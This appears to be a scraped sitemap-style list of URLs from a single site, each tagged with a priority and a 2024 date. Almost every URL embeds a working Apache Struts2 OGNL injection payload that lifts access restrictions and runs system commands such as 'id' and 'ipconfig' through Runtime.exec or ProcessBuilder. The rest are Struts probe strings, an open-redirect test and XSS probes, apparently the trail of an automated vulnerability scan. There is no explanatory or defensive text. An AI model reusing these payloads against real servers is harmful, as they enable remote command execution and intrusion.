http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27%5b%5d_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?=osm19248%c0%beo1%c0%bco2a%90bcoem22524 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?=fsm39367%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem29353 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f=osm19248%ef%bf%bd%ef%bf%bdo1%ef%bf%bd%ef%bf%bdo2a%ef%bf%bdbcoem22524? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f=fsm39367%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem29353? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27%5b%5d_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27%5b%5d_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27%5b%5d_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f=%3c377b20+x%3d949227529%3e? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=i4vpf 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=i4vpf? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?xsstest? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=k6mgo 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 